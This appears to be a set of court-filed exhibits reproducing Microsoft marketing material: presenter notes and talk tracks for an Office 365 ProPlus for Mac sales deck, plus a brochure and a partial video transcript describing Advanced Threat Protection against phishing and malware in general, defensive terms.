- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: There are a many ways ProPlus for Mac enables you and your users to get work done smarter and faster.

Spend time on what's important with Focused Inbox:
- Stay on top of incoming email without having to visit another folder
- Prioritize your actions based on email from the people you interact with often, and the content of the email itself
- Focus on the emails that matter most to you

Incorporate credible content quickly with Researcher:
- Explore and research content without leaving Word
- Add relevant quotes, citable sources, and images to the document
- View related topics to the content being researched

Keep your device free of outdated messages with Sync Slider:
- Control the amount of mail synchronized to your local device
- Choose the right amount of mail to retain over a custom number of days, weeks, or months
- Adjust settings using Group Policy as well

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 13 of 26

Get a better contextual understanding with Smart Lookup:
- Find definitions, synonyms, and parts of speech for any word
- Incorporate information from Bing-powered web searches to enhance your content
- Define unfamiliar terms from Excel spreadsheets

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your people to get work done smarter and faster.



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "visualize data in new ways"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: With new chart types and new functionality in Excel, ProPlus for Mac will help you and your people visualize data in new ways.

Choose the chart that best represents your data with chart recommendations:
- Choose the chart that best represents your data with Excel's built-in intelligence
- Select your preferred chart from a number of recommendations

Visualize hierarchical, financial and geospatial data with new charts:
- Transform geographic data into high-fidelity visualizations
- Identify insights, trends, and opportunities in your data
- Insert maps into Word, PowerPoint, and Outlook

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your teams to visualize data in new ways.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 134 of
726
Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 14 of 26

*Requires a Power BI subscription.



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "work naturally with ink and touch"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: Work naturally with ink and touch within your ProPlus for Mac applications.

Put common commands at your fingertips through Touch Bar support:
- Manipulate graphic elements in PowerPoint
- Hide on-screen ribbons and commands in Word
- Leverage recently used functions in Excel
- Pick from the most commonly used commands in Outlook

Move through work seamlessly using trackpad swipe gestures:
- Navigate your documents, spreadsheets, and presentations intuitively with familiar Multi-Touch gestures

M Use a mouse or trackpad to annotate with ink in OneNote:
- Write notes, highlight portions of text, or draw shapes anywhere on a page
- Choose from a number of color and highlighter options
- Ease any part of your drawing with the Eraser Tool
- Select and modify drawings with the Lasso tool

Please note this is not an exhaustive list. There are more features in ProPlus that will enable your people to work naturally with ink and touch.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 135 of
726
Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 15 of 26



**Guidance**:
- The "hero" slide for the "built for teamwork" section
- Remove subsequent section slides if you want to consolidate your presentation/ not explore each of the main topics and supporting features/capabilities highlighted on this slide
- Feature details can be found in the following slides and in the feature-specific slides in the appendix
- The talk track has been put together with the assumption that all following slides will be shown
- This slide also features hyperlinks that will help you navigate to any one of the topic slides

**Talk track**: ProPlus for Mac is built for teamwork with collaboration in its DNA. There are two major topics we want to explore here, with many features that support those topics.

Our focus today will be on how ProPlus for Mac empowers you and your users to:
- Work together—in the same room or miles apart...
- ...and at the same time or on your own time.



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "work together – in the same room or miles apart..."
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: ProPlus for Mac is built to enable people to work together—in the same room or miles apart. Let's look at some of the ways how this can happen.

Co-author together in Word, PowerPoint, and Excel*:

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 16 of 26

- Collaborate in real-time in the same document
- View where others are editing in the document
- Receive alerts when people enter or leave the document

Share ideas seamlessly with Skype for Business:
- Meet instantly with a fully integrated solution for voice, chat, or HD video*
- Reach other users even when they are not online
- Preload attachments to your online meeting from Outlook

Modernize teamwork with Office 365 Groups:
- Access a shared inbox of conversations, calendar, files, and notebook
- Discover Groups relevant to you based on your peers' work
- Browse, join, and create Groups right from Outlook

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your people to work together—in the same room or miles apart.

* For real-time co-authoring, co-authors must be using Office 2016 for Mac or Office Online.



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "work together – at the same time or on their own time"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: ProPlus for Mac give you and your users to collaborate together at the same time or work separately on your own time. Let's explore.

Flag critical actions and inputs with @mentions:

Case 0:20-cv-60416-XXXX Document 1-1 Entered on FLSD Docket 02/26/2020 Page 17 of 26

|  | • Get their attention with @ in the body of a message or meeting invite<br>• Select from your contact list and automatically add to the To line<br>• Search for messages that mention you<br><br>Easily find files shared with you:<br>• Share your document by inviting others from inside the app<br>• Review who has document access and their editing status<br>• Define document access for each person you're sharing with<br><br>Never lose your work with Activity and Version History:<br>• Look back and understand how your files evolved over time<br>• Restore older versions in case you make a mistake<br>• Quickly access documents you have worked on recently<br><br>Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your teams to work at the same time or on your own time. |
|---|---|
|  | **Guidance**:<br>• The "hero" slide for the "integrated for simplicity" section<br>• Remove subsequent section slides if you want to consolidate your presentation/ not explore each of the main topics and supporting features/capabilities highlighted on this slide<br>• Feature details can be found in the following slides and in the feature-specific slides in the appendix<br>• The talk track has been put together with the assumption that all following slides will be shown<br>• This slide also features hyperlinks that will help you navigate to any one of the topic slides<br><br>**Talk track**: ProPlus for Mac has been designed for simplicity for both users of the apps and services as well as the IT folks who manage the deployment. The goal of ProPlus was to design a seamless experience across all technologies. There are two major ways ProPlus does this. Let's check out the features and capabilities that make it possible. |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 13 of 26

| | |
|---|---|
| | ProPlus for Mac helps you and your people to:<br>• Access your work from anywhere<br>• Deploy, manage, and update with ease |
|  | **Guidance**:<br>• Emphasize how ProPlus for Mac features enable the audience to "access their work anywhere"<br>• This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation<br>• The top bar navigation will enable you to jump to the selected section's "hero" slide<br>• The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature<br><br>**Talk track**: ProPlus for Mac empowers you and your users to access work from anywhere. Let's take a look at the features that support that premise.<br><br>Use Office on all your devices with 5 PC, tablet, and phone activations:<br>• Get your Office apps on every device with a single, unified experience<br>• Be productive from anywhere<br>• Work how and when you want<br><br>Stay productive anywhere with online versions of Office apps:<br>• Utilize a rich "near-desktop" experience<br>• Work anywhere with an internet connection<br>• Modify documents on the go<br><br>Access your work on any device and any platform:<br>• Access your files and data from any activated device, anywhere, on any platform, at any time<br>• Share and collaborate on documents directly from OneDrive<br>• Provide access to anyone in your organization |

|  | Please note this is not an exhaustive list. There are many more features in ProPlus that will enable you to access your work anywhere. |
| --- | --- |
|  | **Guidance**:<br>• Emphasize how ProPlus for Mac features enable the audience to "deploy, manage, and update with ease"<br>• This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation<br>• The top bar navigation will enable you to jump to the selected section's "hero" slide<br>• The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature<br><br>**Talk track**: ProPlus for Mac simplifies the process for deploying the tech and continuing to manage updates. We'll look at how on this slide.<br><br>Simplify the download and deployment process with standard .pkg installs:<br>• Simplify the download, deployment, and installation process with a standard .pkg installation experience<br><br>Manage seamlessly with Intune and Configuration Manager:<br>• Manage and deploy ProPlus with familiar technology<br>• Simplify the admin experience via the Microsoft Intune portal<br>• Control updates and deployment rollouts with System Center Configuration Manager (SCCM)<br><br>Use familiar tools such as Jamf Pro to manage Office on Mac devices :<br>• Use what you know if you're an existing Jamf Pro shop<br>• Make Office available for users automatically or through a self-service catalog<br>• Deliver unified endpoint management for Apple devices running Office<br><br>Automate updates and optimize bandwidth for Office apps:<br>• Automate the detection, download, and application of Office app updates on Mac machines |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 20 of 26

|  | • Configure MAU to use an 'UpdateCache' for low bandwidth scenarios<br>• Control which version of Office apps can be installed with a custom 'ManifestServer'<br><br>Please note this is not an exhaustive list. There are many more features in ProPlus that will enable you and your staff to deploy, manage, and update ProPlus with ease. |
|---|---|
|  | **Guidance**:<br>• The "hero" slide for the "intelligent security" section<br>• Emphasize here that ProPlus for Mac is the most secure way to get Office<br>• Remove subsequent section slides if you want to consolidate your presentation/ not explore each of the main topics and supporting features/capabilities highlighted on this slide<br>• Feature details can be found in the following slides and in the feature-specific slides in the appendix<br>• The talk track has been put together with the assumption that all following slides will be shown<br>• This slide also features hyperlinks that will help you navigate to any one of the topic slides<br><br>**Talk track**: Your organization's protection is priority number one for the Office 365 folks who develop and work on ProPlus for Mac.<br><br>ProPlus has been designed following the Microsoft Security Development Lifecycle. Here at Microsoft, we bring together the best practices from two decades of building enterprise software and managing online services to give you an integrated software-as-a-service solution. We also provide you with numerous resources, features, and capabilities to ensure your organization is safe from even the most advanced threats. Let's check how ProPlus for Mac makes this a reality.<br><br>ProPlus helps you and your people to:<br>• Detect issues before they happen<br>• Safeguard your company's most important data |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 21 of 26



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "detect issues before they happen"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: Cybersecurity threats have become ubiquitous in today's digital landscape and organizations must arm themselves against advanced attacks. There are a number of features in the ecosystem surrounding ProPlus for Mac that makes it possible to defend your organization against these sophisticated threats.

Defend against malicious documents with ATP Safe Attachments*:
- Protect your organization from harmful attachments through ATP Safe Attachments policies
- Set policies to identify if email attachments are malicious
- View ATP reports in the Office 365 Security and Compliance Center dashboard

Ensure hyperlinks in documents are harmless with ATP Safe Links*:
- Protect your organization from harmful hyperlinks through ATP Safe Links policies
- Create a custom blocked URL list for more advanced protection
- View ATP reports in the Office 365 Security and Compliance Center dashboard

Neutralize spear-phishing tactics using ATP URL Detonation*:
- Prevent users from being compromised by files linked to malicious URLs
- Configure a SafeLink policy that turns on the URL trace to track user clicks (especially useful for instances when users can bypass the warning and click through to blocked pages)
- Focus on remediation efforts for impacted users while not disrupting the work of unaffected users

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 142 of
726
Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 22 of 26

Please note this is not an exhaustive list. There are more features in ProPlus that will enable you and teams to detect issues before they happen.

*Must have an E5 subscription or purchased a separate ATP subscription (for E1, E3, and ProPlus for Mac standalone SKUs).



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "safeguard their company's most important data"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: Company data is one of the most important assets your organization owns. It is also the most sought-after prize malicious hackers attempt to get their hands on. ProPlus for Mac has a number of built-in strategies to keep your data where it belongs.

Protect sensitive documents with Information Rights Management*:
- Restrict permission to content in documents, workbooks, and presentations
- Set access permissions to help prevent sensitive information from being printed, forwarded, or copied by unauthorized people
- Enforce corporate policy governing the control and dissemination of confidential or proprietary information

Defend against spam and malware using Exchange Online Protection*:
- Protect your organization against spam and malware
- Safeguard your organization from messaging-policy violations
- Simplify the management of your messaging environment and alleviate many of the burdens that come with maintaining on-premises hardware and software

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 23 of 26

|  | Embrace multi-layer defense with Multi-Factor Authentication:<br>• Enforce an additional layer of security for user sign-ins and transactions<br>• Manage multi-factor authentication (MFA) policies from a unified Office 365 admin center<br>• Establish authentication factors that work best for your users—using a mobile app, phone call, SMS, etc.<br><br>Please note this is not an exhaustive list. There are more features in ProPlus that will enable you and your staff to safeguard your company's most important data.<br><br>* Must have an Office 365 E1, E3, or E5 subscription. |
|---|---|
|  | **Guidance**:<br>• Use the Office Enterprise Hero Demo as your source for demo material (demos.microsoft.com)<br>• Do a demo here or after relevant sections throughout the presentation<br>• Remove this slide if not doing a demo here<br><br>**Talk track**: N/a |
|  | **Guidance**:<br>• Provide assurance to the customer that Microsoft has a proven and programmatic method for helping them deploy ProPlus for Mac<br>• Emphasize that the customers don't have to do this themselves, but there are resources available (for free for deployments over 50 seats) to help onboard and get them up and running quickly and easily<br><br>**Talk track**: Our mission as a company—to help every individual and business on the planet achieve more—is not only about the products we create, but how we enable customers to get the most value out of those products. |

We've designed FastTrack – our customer success service – to help you move to Office 365, smoothly and with confidence, and realize business value faster. It is available as part of your Office 365 subscription*, and provides you with a set of best practices, tools, resources, and experts committed to making the experience with Office 365 a success.

With the FastTrack Center benefit for Office 365, you work remotely with Microsoft specialists** to get your Office 365 environment ready for use and plan rollout and usage within your organization. Microsoft has 800+ FastTrack engineers worldwide who have worked with customers to develop over 51,000 success plans to onboard and drive adoption of Office 365.

Microsoft FastTrack assists with core onboarding, which involves service provisioning and tenant and identity integration. It also includes steps for providing a foundation for onboarding services like Exchange Online, SharePoint Online, Skype for Business Online, and Office 365 ProPlus for Mac.

For Office 365 ProPlus for Mac, we further provide guidance on:
- Addressing deployment issues such as application compatibility with an assessment using Office Telemetry***
- Assigning end-user licenses using the Office 365 admin center and Windows PowerShell
- Configuring update settings using the Office Deployment Tool
- Setting up a single on-site distribution server for Office 365 ProPlus, including assistance with the creation of a configuration.xml file for use with the Office Deployment Tool
- Deploying using Microsoft System Center Configuration Manager, including assistance with the creation of System Center Configuration Manager packaging
- Installing Office 365 ProPlus from the Office 365 portal using Click-to-Run
- Installing Office Mobile apps (like Outlook Mobile, Word Mobile, Excel Mobile, and PowerPoint Mobile) on your iOS, Android, or Windows Mobile devices

Microsoft FastTrack has assisted in the migration of over 4.1M seats and 3.7PB of data, enabling over 22,000 customers to experience the benefits of Office 365.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 25 of 26

| | For more information on Microsoft FastTrack, visit http://fasttrack.microsoft.com. |
|---|---|
| | DISCLAIMERS:<br>*FastTrack resources and services are included with Office 365 ProPlus for customers with at least 50 seats. For 50-149 seat customers, we provide migration guidance only. 150 seats and above qualify for the migration benefit using the migration factory.<br><br>**The FastTrack Center is available during normal business hours for a given region. Assistance is available in Traditional Chinese and Simplified Chinese (resources speak Mandarin only), English, French, German, Italian, Japanese, Korean, Portuguese (Brazil), Spanish, Thai, and Vietnamese.<br><br>***Office Telemetry available to FastTrack customers with greater than 20,000 seats. |
|  | **Guidance**:<br>• Wrap up the conversation<br>• Provide clear and actionable "go-dos"<br>• Modify this slide for a more specific CTA and/or audience if needed<br><br>**Talk track**: If you are interested in learning more about the value Office 365 ProPlus can provide to your company, there are a number of additional materials available for continued education. We recommend the following:<br>• Dive deeper into Office 365 products and solutions<br>• Schedule a hands-on Customer Immersion Experience<br>• Initiate an Office 365 pilot through FastTrack |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 26 of 26



**Guidance**:
- Closing slide
- Wrap up the conversation
- Q&A

**Talk track**: Thank you for taking the time to discuss with us today. Are there any additional question before we wrap up?

# EXHIBIT 7

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 2 of 10

# Office Essentials





## Advanced Threat Protection in Office 365

| Anti-phishing | Safe Attachments | Safe Links | Anti-spam | Spoof Intelligence | Anti-malware |

Catch threats before they disrupt your organization, keeping your data, intellectual property and users safe from email phishing attacks and zero-day malware.

## Email: a trojan horse for cyber-attacks

**We all use email**. It's one of the most pervasive and powerful forms of communication and collaboration, but it's also the most prolific attack vector that we see today. Emails often serve as a trojan horse for attackers to target and compromise your users by "phishing" their credentials.

Some phishing attacks can be blatant as in the case of ransomware; others can remain undiscovered allowing assailants to silently move laterally within your network to breach your data and potentially steal intellectual property.



*Phishing is a primary vehicle for malicious Ransomware code*



*Phishing email designed to steal user credentials*

Case 0:20-cv-60416-XXXX   Document 3-9   Entered on FLSD Docket 02/26/2020   Page 3 of 10



## Industry leading threat detection

Keeping up to date with the threat landscape can be nearly impossible as the increasing sophistication of rapidly evolving unknown threats, can quickly outdate the protections that you may have put in place. At the core of preventing any malicious attack is how quickly we can detect malicious activity. To help you to stay ahead of the threat landscape, Microsoft invests at least a billion dollars in this area annually.

Our security teams span thousands of cyber-security experts globally and serve as a virtual extension of your own internal security teams. Utilizing signals from the Microsoft Intelligent Security Graph in conjunction with machine learning, they determine known and unknown attack vectors.



*Cyber security experts at the Microsoft Cybercrime Center*

The Microsoft Intelligent Security Graph, collects and analyzes an estimated 6.5 trillion signals per day from user log-ins across services, device end points, email messages and documents; Microsoft and non-Microsoft cloud apps, and our Azure public cloud infrastructure.

This scale gives Microsoft a vast window into the threat landscape, with unique insights that surpass other email protection solutions.

Importantly, exploits detected across these different sources are made known across all Microsoft services to enhance our vulnerability detection and protection capabilities across the stack.



Our average malware catch rate for Office 365 email is the highest in the industry at 99.9%, and we have the lowest miss rate of phishing emails for Office 365.

Case 0:20-cv-60416-XXXC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 4 of 10



# Layered defense-in-depth approach

Office 365 Advanced Threat Protection catches threats before they disrupt your organization by applying a systematic defense-in-depth approach that analyzes and protects against threats from the point at which an email is received by Office 365 to when it is delivered. This starts by identifying:

- Where the email is coming from by understanding the source

- Who the sender is and if the person, brand and or domain is authentic

- What's inside the email that could be compromising

- What post-delivery protections need to be put in place once the email is delivered to the recipient



*Advanced Threat Protection in Office 365 provides best of breed capabilities for each defense layer*



At any point in time, as an admin you can further harden your security posture against threats through near real-time reports, so that you can investigate and then respond to threats with built-in customer controls.



## Who is the source?

Before an email is delivered to an inbox, around 25% of all malicious messages received are blocked immediately at the edge. We look at the reputation of IP addresses by referencing our constantly updated block list of millions of domains and IPs. If the source is a known perpetrator of malicious messages, we will block it. Equally, machine learning models running on the edge determine email traffic patterns for your domain, blocking anomalous email traffic as necessary.

Case 0:20-cv-60416-XXXX    Document 3-9    Entered on FLSD Docket 02/26/2020    Page 151 of 726



## Who is the sender?

Next, we check that the sender really is who they appear to be by authenticating the source to prevent against spoofing, another common phishing technique. Here we are looking for evidence of spoofed domains, brands and people.

Spoofed emails look like they come from someone or something that you know or trust. The premise is that you are more likely to trust an email from someone of importance or a brand entity that you know.

Anti-phishing policies in Office 365 will verify the authenticity of the domain source against standard frameworks like Sender Policy Framework (SPF); Domain Keys Identified Mail (DKIM) and Domain-based Message Authentication (DMARC) and also apply additional measures to detect the spoofing of internal or external domains.





In cases where emails are sent between domains that your organization owns, our anti-spoof technology will validate the origin of a message to make sure that it truly originated in your organization.

*Internal Domain Spoofing*

*User and brand impersonation detected by Office 365*



*Spoofed domains detected by Office 365*

For external domains, within or outside of our Office 365 ecosystem, our spoof intelligence first checks to see if the domain has been set up according to SPF, DKIM and DMAC standards. Then if not, it will observe and learn message sending patterns from the domain to identify when a message has been spoofed.

As an admin, you can access spoof intelligence under the antispam policy report to monitor suspected spoofing activity and influence the filter by forming an approved list of legitimate internal and external domains for your organization.

Case 0:20-cv-60416-XXXX   Document 3-9   Entered on FLSD Docket 02/26/2020   Page 6 of 10



## User impersonation



To protect against impersonation of your high-profile users, mailbox intelligence in Office 365 applies a machine learning model to form a contact graph of whom they are normally in contact with. This provides a strong signal for Office 365 to decipher anomalous and good behavior and to detect impersonation attempts of trusted individuals in your organization.

## What's inside the message

To determine what's inside the message, we utilize a number of standard anti-virus and anti-malware engines to detect malicious content, combined with our Safe Attachment and Safe Links capabilities.



Safe Attachments        Safe Links        Anti-malware

Blocked

Deleted

Moved to junk

Unsafe        Safe

*Attachments and links are detonated with actions taken according to the policies you have in place*

Attachments or links in the email are opened inside a sandbox environment where the content is meticulously analyzed by our machine learning models that check for malicious signals and apply deep link inspection. This allows for zero-day malicious attachments and links to be detected.

Each month we detonate around 1 billion items in our sandbox and the telemetry feeds back into the Microsoft Intelligent Security Graph to help our machine learning stay current with new and emerging techniques.

Even if the message passes through detonations, the content is analyzed further by multiple machine learning models. These examine the full message and we take actions based on what you have configured as policy.

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 1 of 10



## Post-delivery protections

Sophisticated attackers will plan to ensure links pass through the first round of security filters. They do this by making the links benign, only to weaponize them after the message is delivered, altering the destination of the links to a malicious site.



20% of all clicks happen within 5 minutes from when an email is received.

*Safe Links protects users at the point of click*

With Safe Links, we are able to protect users right at the point of click by checking the link for reputation and triggering detonation if necessary.

*Weaponized links are detonated by Safe Links and the recipient warned*

Safe Links protection also extends to internal only emails. Unlike other email solutions, we are able to scan and isolate threats without routing these emails outside of Office 365.



*Real destination address of link revealed on hover to inform of potential threat*

Users are also made aware of the site they will be directed to as they hover over the link using native link rendering.

The service continues to scan email content for multiple days, leveraging new intelligence to move newly discovered malware or phish, by design, to the junk folder through a capability called zero-hour auto purge.



*Malware infected email moved to Junk folder*



*Zero-hour auto purge moves weaponized content to the junk folder*

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 8 of 10



## User self-reporting

Of course, while protections are automated in the background, we also encourage email recipients to be vigilant in identifying messages that appear suspicious. By enabling the report a message capability in your tenant, users can self-report suspect emails for validation by Microsoft and your security teams.



*Users are able to self-report suspicious emails*



*Admin view of user, self-reported threats*

## Protections beyond email

Outside email it's important to ensure protections extend to malware infected content that may have been taken from email and placed on a share. Advanced Threat Protection in Office 365 uniquely extends protections beyond email. If malicious files or links are uploaded to SharePoint or OneDrive and shared, even via Microsoft Teams, our protection layers will detect it, block it, and contain the threat by preventing the file from being opened or shared in the future.



*Malicious links blocked in OneDrive*



*Malicious links blocked in Microsoft Teams*

Case 0:20-cv-60416-XXXX    Document 3-1    Entered on FLSD Docket 02/26/2020    Page 9 of 10



## Review and respond

We give you near real-time reports to allow you to see emails within your organization and how they were handled by Office 365. This includes messages flagged by users as potential threats. Office 365 will additionally proactively surface insights and recommendations which you can use to determine what additional policies and protections you need to consider within your environment.

In the Security and Compliance Center, you can set up your phishing policies, define impersonation settings, investigate threats, review quarantined messages and how often they were sent, review detonations and get details on the nature of the threat and why it was detected. For example, under threat management you can drill in to see the top malware types and top targeted users.



**Office 365 ATP blocked 5 billion phish emails in 2018**

*Threat intelligence dashboard view*

Within "Threat Explorer", malicious emails can be quickly identified with options to filter on sender, recipient and subject or other metadata in the message. Filtering on sender helps you to see all the emails sent from a unique sender address used for a phishing campaign. You can then investigate these emails further and take actions such as purging a malicious email campaign entirely from all mailboxes in your organization at once.



*Drill down of top malware types and top targeted users*



*Incident investigation in Office 365*

Investigation into an incident can also be separately delegated to your security investigation team, leaving it you your security admins to take the final actions. Also, because we know that there are common security issues that you will want to check over time, whether that's reviewing events, getting alerts, or determining threat trends, the threat tracker in our threat intelligence service enables ongoing supervision of your security tasks.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 15 of 10



## Educating and protecting users

Using services such as Attack Simulator in Office 365, we help you to broadly educate your users and augment your internal penetration testing capabilities by simulating phishing attacks in your organization to raise awareness of what to look for in a phishing campaign.



Of course, there are other measures that you can put in place to protect your user identities. Microsoft is on a path to help the elimination of passwords altogether through password-less sign-in. We estimate that just by enabling multi-factor authentication in your organization, you can reduce your risk of attacks by 99.99%.

82% of all security breaches occur due to stolen passwords

*Attack Simulator in Office 365, is designed to help you to penetration test your environment and educate users*

## Continued Learning

In Office 365, we give you built-in, proactive protections with Advanced Threat Protection. These protections extend to your collaboration services, such as SharePoint, OneDrive, and Microsoft Teams, in additions to your email services to mitigate malicious content. From:

- Intelligent and continuously evolving threat detection
- Visibility into threats, including real-time reporting to help you to investigate, remediate and respond to threats
- Advanced controls you set to harden your environment
- And tools to educate your users on phishing campaigns.

To learn more and try out Office 365 Advance Threat Protection capabilities for yourself, by visiting aka.ms/E5Trial today. Also watch our essentials video on Advanced Threat Protection in Office 365 here for more detail.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 157 of

# EXHIBIT 8

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 2 of 9

- Welcome to Office Essentials.
The next few minutes, we'll look at
Advanced Threat Protection
capabilities in Office 365

that help you catch threats
before they disrupt your business,
keeping your data, intellectual
property, and users safe
from email phishing attacks
and zero day malware.
Now, we all use emails,
one of the most pervasive

and powerful forms of
communication and collaboration.
But it's also the most
prolific attack vector
that we see today.
Now, that can serve as a
Trojan Horse for attackers
to target and compromise your users
by phishing their credentials
or weaponizing content
in order to penetrate your organization.
Now sometimes these attacks are blatant,
such as in the case of ransomware.
Other times, the danger is
that they remain undetected,
allowing assailants to,
once in, silently move
laterally inside of your
network to breach your data
and potentially steal
intellectual property.
Additionally, the
increasing sophistication
of these attacks can quickly
outdate the protections
that you may have put in
place, leaving you unprotected

from rapidly evolving
new and unknown threats.
Our approach with Advanced
Threat Protection in Office 365
is to give you built-in,
proactive protections

that even extend to your
collaboration services and email
to mitigate malicious content,
as well as intelligent

and continuous evolving
threat detection so
that you can stay ahead

of new and emerging threats,
and the ability to review activities
gathered in real time to
remediate and respond to threats
along with controls that you
set to harden your environment
and educate your users
on phishing campaigns.
So let me break this down by starting with
the core of all prevention: detection.
Now, we invest at least a billion dollars
in this area annually
and our security teams
span thousands of
cybersecurity experts globally
to serve as a virtual extension
of your internal security teams.
They operate under assumed breach
to determine known and
unknown attack vectors,
utilizing signal intelligence
from the Microsoft
Intelligent Security Graph
and machine learning for
detection and response.
To put this into perspective,
the security graph collects
and analyzes an estimated
6.5 trillion signals per day
from user logins across services,
device endpoints, email
messages and documents,
Microsoft and non-Microsoft Cloud apps,
in addition to our Azure
public cloud infrastructure.
There are big advantages to this scale.
It gives us greater depth and breadth
into the threat landscape
ahead of other email protection solutions.
Now, exploits detected
at any point in the chain
are made known across
Microsoft services universally.
Including, in this case, email to enhance
our vulnerability detection
and protection capabilities
really across the stack.
And with such a huge volume of signal,

our email threat detection engines

Case 0:20-cv-60416-XXXX   Document 3-10   Entered on FLSD Docket 02/26/2020   Page 4 of 9

also reduce false positives
by continually determining
the unique signals of new threats
and training our machine
learning algorithms.
Our average malware catch rate
for Office 365 email today
is the highest in the industry
and we have the lowest missed rate
of phish emails for Office 365.
Of course, detection goes
hand-in-hand with protection
to be able to both catch attacks
and stop them in their tracks.
We take a pragmatic, layered
defense in-depth approach,
analyzing and protecting against threats
from the point at which the
email is received by Office 365
to when it's delivered and beyond.
Now, this starts first by determining
where the email is coming
from, or the source.
Then who the mail sender is,
what's inside that could be compromising,
and once delivered, what
post-delivery protections
need to be put in place.
And at any point,
we help you to review in real time
what's going on and respond to threats.
Around 25% of all
malicious messages received
are blocked at the edge.
Now, if the email is on our known list
of bad domains, we'll block it.
Equally, we look at the
reputation of IP addresses.
Microsoft keeps a constantly
updated block list
of millions of IPs, and if the
source is a known perpetrator
of malicious messages,
we'll block that, as well.
Additionally, we run
machine learning models
that further analyze the
connection for suspicious patterns,
blocking email traffic as necessary.
The next area of scrutiny
is to check that the sender
really is who they appear to be
by checking the authenticity of the source
to prevent against spoofing,

another common phishing technique.
Now, while there are many
standards with frameworks
like SPF, DKIM, and DMARC
to help with domain authentication,
not everyone sets this up.
In the case of internal domain spoofing,
where emails are sent between domains
that your organization owns,
our anti-spoof technology
will validate the origin
of a message to make sure
that the message truly
originated in your organization.
And in the case of external domains
within or outside of the
Office 365 ecosystem,
our spoof intelligence
again first checks to see
if the domain has been set
up according to standards,
and if it doesn't, we'll observe and learn
message-sending patterns from the domain
to be able to identify when
a message has been spoofed.
As an admin, you can
access spoof intelligence
under the anti-spam policy report
to monitor suspected spoofing activity
and influence the filter
by forming an approved list
of legitimate internal
and external domains
for your organization.
Now, understanding who really
is the sender also prevents
targeted spear phishing
attacks using impersonation.
These emails look like
they come from someone
or something that you know or trust.
Now, the premise is
that you're more likely
to trust an email from
someone of importance
or a brand entity that you know.
Anti-phishing policies in Office 365
detect these types of
impersonation attacks
and allow administrators
to take appropriate actions on messages.
Also, mailbox intelligence in Office 365
uses a machine learning
model around your users,

Case 0:20-cv-60416-XXXX   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 6 of 9

forming a contact graph of whom
they're normally in contact with,
and this provides us a strong signal
to decipher against
anomalous and good behavior.
It can also detect impersonation attempts
of specific brands.
And to prevent false positives,
you're also able to allow
legitimate impersonation
where, for example, an exec might have
an admin responding on their behalf.
Next, to determine if
what's inside the message
is good or bad, we utilize a
number of standard anti-virus
and anti-malware engines to
detect malicious content.
